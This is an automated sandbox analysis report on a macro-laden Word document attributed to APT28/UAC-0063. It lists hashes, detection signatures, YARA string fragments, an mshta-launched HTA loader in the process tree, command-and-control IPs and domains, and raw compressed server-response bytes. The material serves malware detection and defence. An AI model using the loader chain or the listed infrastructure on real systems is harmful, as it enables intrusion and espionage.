Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rev5_ Joint Declaration C5 GER_track changes.doc

Overview

General Information

Sample name:Rev5_ Joint Declaration C5 GER_track changes.doc
Analysis ID:1590268
MD5:a15e652cf058209c0c0040dfcaf86fec
SHA1:0f162082585615212dd8a3fce41944a9a04c5a21
SHA256:47092548660d5200ea368aacbfe03435c88b6674b0975bb87a124736052bd7c3
Tags:docUAC-0063user-smica83
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Document contains an embedded VBA macro which accesses itself as a binary file (likely for evasion)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Machine Learning detection for dropped file
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)
Document contains embedded VBA macros
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Yara signature match

Classification

Process Tree

  • System is w11x64_office
  • WINWORD.EXE (PID: 7992 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • WINWORD.EXE (PID: 2392 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • mshta.exe (PID: 1460 cmdline: "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Settings\locale MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
settings.xmlapt_susp_apt28_uac0063_malicious_doc_settings_xmlDetects some suspected APT28 document settings.xmlSekoia.io
  • 0x36c1:$: Call svc.GetFolder(
  • 0x3201:$: CreateTextFile(appdir

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Settings\localeapt_susp_apt28_uac0063_hta_loaderDetects some suspected APT28 HTA loaderSekoia.io
  • 0x0:$: <HEAD><HTA:APPLICATION ID
  • 0xec:$: script Language="VBScript.Encode

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2963111692.00000230803F0000.00000004.00000800.00020000.00000000.sdmpapt_susp_apt28_uac0063_hta_loaderDetects some suspected APT28 HTA loaderSekoia.io
  • 0x0:$: <HEAD><HTA:APPLICATION ID
  • 0xec:$: script Language="VBScript.Encode
Process Memory Space: mshta.exe PID: 1460apt_susp_apt28_uac0063_hta_loaderDetects some suspected APT28 HTA loaderSekoia.io
  • 0x6c51:$: <HEAD><HTA:APPLICATION ID
  • 0x6d3d:$: script Language="VBScript.Encode

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-13T21:33:51.571617+010020577421A Network Trojan was detected2.58.15.15880192.168.2.2659240TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Rev5_ Joint Declaration C5 GER_track changes.docAvira: detected
Multi AV Scanner detection for submitted file
Source: Rev5_ Joint Declaration C5 GER_track changes.docReversingLabs: Detection: 34%
Source: Rev5_ Joint Declaration C5 GER_track changes.docVirustotal: Detection: 42%Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\~WRD0000.tmpJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\~WRD0001.tmpJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59244 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59246 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59249 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59251 version: TLS 1.2
Source: global trafficDNS query: name: 171.39.242.20.in-addr.arpa
Source: global trafficDNS query: name: background-services.net
Source: global trafficTCP traffic: 192.168.2.26:49676 -> 52.182.143.209:443
Source: global trafficTCP traffic: 192.168.2.26:49676 -> 52.182.143.209:443
Source: global trafficTCP traffic: 192.168.2.26:49675 -> 2.16.158.35:443
Source: global trafficTCP traffic: 192.168.2.26:49676 -> 52.182.143.209:443
Source: global trafficTCP traffic: 192.168.2.26:49676 -> 52.182.143.209:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49691 -> 2.23.242.162:443
Source: global trafficTCP traffic: 192.168.2.26:49691 -> 2.23.242.162:443
Source: global trafficTCP traffic: 192.168.2.26:49692 -> 2.16.168.103:443
Source: global trafficTCP traffic: 192.168.2.26:49692 -> 2.16.168.103:443
Source: global trafficTCP traffic: 192.168.2.26:49687 -> 2.16.158.35:443
Source: global trafficTCP traffic: 192.168.2.26:49687 -> 2.16.158.35:443
Source: global trafficTCP traffic: 192.168.2.26:49687 -> 2.16.158.35:443
Source: global trafficTCP traffic: 192.168.2.26:49687 -> 2.16.158.35:443
Source: global trafficTCP traffic: 192.168.2.26:49672 -> 20.198.118.190:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:49676 -> 52.182.143.209:443
Source: global trafficTCP traffic: 192.168.2.26:49676 -> 52.182.143.209:443
Source: global trafficTCP traffic: 192.168.2.26:49675 -> 2.16.158.35:443
Source: global trafficTCP traffic: 192.168.2.26:49676 -> 52.182.143.209:443
Source: global trafficTCP traffic: 192.168.2.26:49676 -> 52.182.143.209:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:59224 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.26:59224
Source: global trafficTCP traffic: 192.168.2.26:59224 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.26:59224
Source: global trafficTCP traffic: 192.168.2.26:59224 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.26:59224
Source: global trafficTCP traffic: 192.168.2.26:59224 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59242 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59242
Source: global trafficTCP traffic: 192.168.2.26:59242 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59242 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59242 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59242
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59242
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59242
Source: global trafficTCP traffic: 192.168.2.26:59242 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59242
Source: global trafficTCP traffic: 192.168.2.26:59242 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:49691 -> 2.23.242.162:443
Source: global trafficTCP traffic: 2.23.242.162:443 -> 192.168.2.26:49691
Source: global trafficTCP traffic: 192.168.2.26:49691 -> 2.23.242.162:443
Source: global trafficTCP traffic: 192.168.2.26:49692 -> 2.16.168.103:443
Source: global trafficTCP traffic: 2.16.168.103:443 -> 192.168.2.26:49692
Source: global trafficTCP traffic: 192.168.2.26:49692 -> 2.16.168.103:443
Source: global trafficTCP traffic: 192.168.2.26:59242 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59243 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.16.158.35:443 -> 192.168.2.26:49687
Source: global trafficTCP traffic: 2.16.158.35:443 -> 192.168.2.26:49687
Source: global trafficTCP traffic: 2.16.158.35:443 -> 192.168.2.26:49687
Source: global trafficTCP traffic: 2.16.158.35:443 -> 192.168.2.26:49687
Source: global trafficTCP traffic: 192.168.2.26:49687 -> 2.16.158.35:443
Source: global trafficTCP traffic: 192.168.2.26:49687 -> 2.16.158.35:443
Source: global trafficTCP traffic: 192.168.2.26:49687 -> 2.16.158.35:443
Source: global trafficTCP traffic: 192.168.2.26:49687 -> 2.16.158.35:443
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59242
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59243
Source: global trafficTCP traffic: 192.168.2.26:59243 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59243 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59243 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.16.158.35:443 -> 192.168.2.26:49687
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59243
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59243
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59243
Source: global trafficTCP traffic: 192.168.2.26:59243 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59243
Source: global trafficTCP traffic: 192.168.2.26:59243 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:49672 -> 20.198.118.190:443
Source: global trafficTCP traffic: 20.198.118.190:443 -> 192.168.2.26:49672
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global trafficTCP traffic: 192.168.2.26:59243 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59248 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59243
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59248
Source: global trafficTCP traffic: 192.168.2.26:59248 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59248 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59248 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59248
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59248
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59248
Source: global trafficTCP traffic: 192.168.2.26:59248 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59248
Source: global trafficTCP traffic: 192.168.2.26:59248 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global trafficTCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59248 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59248
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global trafficTCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global trafficTCP traffic: 192.168.2.26:59253 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59253
Source: global trafficTCP traffic: 192.168.2.26:59253 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59253 -> 2.58.15.158:80
Source: global trafficTCP traffic: 192.168.2.26:59253 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59253
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59253
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59253
Source: global trafficTCP traffic: 192.168.2.26:59253 -> 2.58.15.158:80
Source: global trafficTCP traffic: 2.58.15.158:80 -> 192.168.2.26:59253
Source: global trafficTCP traffic: 192.168.2.26:59253 -> 2.58.15.158:80

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2057742 - Severity 1 - ET MALWARE TA426/Zebrocy Hatvibe CnC Server Response M1 : 2.58.15.158:80 -> 192.168.2.26:59240
Source: global trafficTCP traffic: 192.168.2.26:59224 -> 162.159.36.2:53
Source: Joe Sandbox ViewASN Name: HIGHWINDS2US HIGHWINDS2US
Source: Joe Sandbox ViewJA3 fingerprint: 6a5d235ee78c6aede6a61448b4e9ff1e
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.209
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.209
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.35
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.209
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.209
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.168.103
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.168.103
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.35
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.35
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.35
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.35
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Jan 2025 20:33:51 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 945Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 56 0b 6e e3 3a 0c bc 92 44 52 94 75 9c c4 9f 3d c0 de 1f 78 33 94 a5 38 69 ba 68 83 57 a3 81 ad 0f 39 1c 7e ff 6e 65 db 0e dd f5 f8 63 7f 8e ed af 1d be 4b b2 52 a5 8a 1f 55 24 15 f1 52 b5 16 df bc 60 67 c7 d7 52 2d 6d e9 e6 e6 87 9f 3b be 57 93 dd 2b 76 cd 8a af 3e 57 ab 9a d4 56 cc b3 57 dc ce 21 67 11 81 cc 84 af 5d 44 9a 2c 9a f0 bb 7b 73 93 a4 9b 24 11 57 48 37 c8 10 48 83 1e bf 03 0c b4 9a 43 e3 0e bd 86 d3 81 d6 17 85 b4 52 8a 99 6b 56 97 c5 17 69 3c 9b da 6f ec 49 d0 ee 19 72 b3 11 3f ac c1 fb d2 f1 f4 95 27 c9 de e5 e1 14 25 97 9a 0c 92 c1 40 a3 46 de d1 0c 6d e0 08 67 de ca 2d b4 01 f7 70 f2 d4 9f 5a 0d 74 fd fe f9 7e 87 76 f5 a5 0a 8c 58 4c 21 03 12 c8 a0 b8 f3 f7 6e 5b f0 46 6c eb 